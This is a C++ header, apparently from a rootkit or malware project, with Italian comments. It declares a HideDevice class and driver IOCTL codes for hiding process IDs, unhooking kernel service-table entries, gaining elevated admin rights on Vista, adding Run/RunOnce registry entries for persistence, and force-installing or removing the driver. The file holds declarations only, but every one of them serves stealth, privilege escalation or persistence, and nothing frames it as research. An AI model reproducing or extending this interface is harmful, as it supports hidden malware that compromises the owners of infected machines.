UnHookClass.h
#define PREAMBLE_SIZE 10
#pragma pack(1)
typedef struct fixup_entry {
DWORD func_addr;
unsigned char func_preamble[PREAMBLE_SIZE];
} fu_entry;
typedef struct UnHookEntry {
unsigned int index;
fu_entry fix_up;
} UHE;
typedef struct AddPidEntry {
DWORD PID;
DWORD is_add;
} APE;
typedef struct registry_entry {
DWORD is_deleting;
WCHAR key_name[256];
WCHAR value_name[50];
WCHAR value[1024];
} REE;
#pragma pack()
class HideDevice
{
public:
void HideDevice::unhook_close(); // Chiude il device di unhook
BOOL HideDevice::unhook_all(BOOL is_fixup); // Unhooka tutte le funzioni hookate
BOOL HideDevice::unhook_func(char *func_name, BOOL is_fixup); // Unhooka una funzione particolare
BOOL HideDevice::unhook_hidepid(DWORD PID, BOOL is_add); // Aggiunge/toglie un pid alla lista di quelli da nascondere
BOOL HideDevice::unhook_getadmin(); // Su vista rende admin "figo" (non usare su XP)
BOOL HideDevice::unhook_isdrv(WCHAR *driver_name); // Dice se c'e' il driver che gira
BOOL HideDevice::unhook_getpath(WCHAR *driver_name, WCHAR *driver_path, DWORD size); // Torna il path del driver
BOOL HideDevice::unhook_isdev(); // Dice se c'e' il device di unhooking
BOOL HideDevice::unhook_regwriteW(WCHAR *value_name, WCHAR *value); // Inserisce una chiave in Run/RunOnce
BOOL HideDevice::unhook_regdeleteW(WCHAR *value_name); // Cancella una chiave da Run/RunOnce
BOOL HideDevice::unhook_regwriteA(char *value_name, char *value); // Inserisce una chiave in Run/RunOnce
BOOL HideDevice::unhook_regdeleteA(char *value_name); // Cancella una chiave da Run/RunOnce
BOOL HideDevice::unhook_uninstall(); // Rimuove il driver dal registry
BOOL HideDevice::df_thaw(WCHAR freezed, WCHAR *thawed); // Monta un device "reale"
BOOL HideDevice::df_freeze(); // Smonta un device "reale"
HideDevice(void);
HideDevice(WCHAR *driver_path); // Installa anche il driver (il forcing funziona solo su XP)
~HideDevice(void);
private:
BOOL HideDevice::unhook_init();
#define NUM_OF_SERVICES 0x300
fu_entry SDT_Table[NUM_OF_SERVICES];
DWORD sdt_entry_count;
HANDLE hFile;
BOOL sdt_init;
};
#ifndef CTL_CODE
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)
#endif
#ifndef METHOD_BUFFERED
#define METHOD_BUFFERED 0
#endif
#ifndef FILE_WRITE_ACCESS
#define FILE_WRITE_ACCESS ( 0x0002 )
#endif
#define FILE_DEVICE_H4DRIVER 0x00008234
#define ADMIN_FUNCTION 0x0882
#define UNHOOK_FUNCTION 0x0883
#define ADDPID_FUNCTION 0x0884
#define REG_FUNCTION 0x0885
#define THAW_FUNCTION 0x0886
#define FREEZE_FUNCTION 0x0887
#define UNINSTALL_FUNCTION 0x0888
#define IOCTL_UNHOOK CTL_CODE(FILE_DEVICE_H4DRIVER, UNHOOK_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A20C
#define IOCTL_ADDPID CTL_CODE(FILE_DEVICE_H4DRIVER, ADDPID_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A210
#define IOCTL_ADMIN CTL_CODE(FILE_DEVICE_H4DRIVER, ADMIN_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A208
#define IOCTL_REG CTL_CODE(FILE_DEVICE_H4DRIVER, REG_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A214
#define IOCTL_THAW CTL_CODE(FILE_DEVICE_H4DRIVER, THAW_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_FREEZE CTL_CODE(FILE_DEVICE_H4DRIVER, FREEZE_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_UNINST CTL_CODE(FILE_DEVICE_H4DRIVER, UNINSTALL_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS)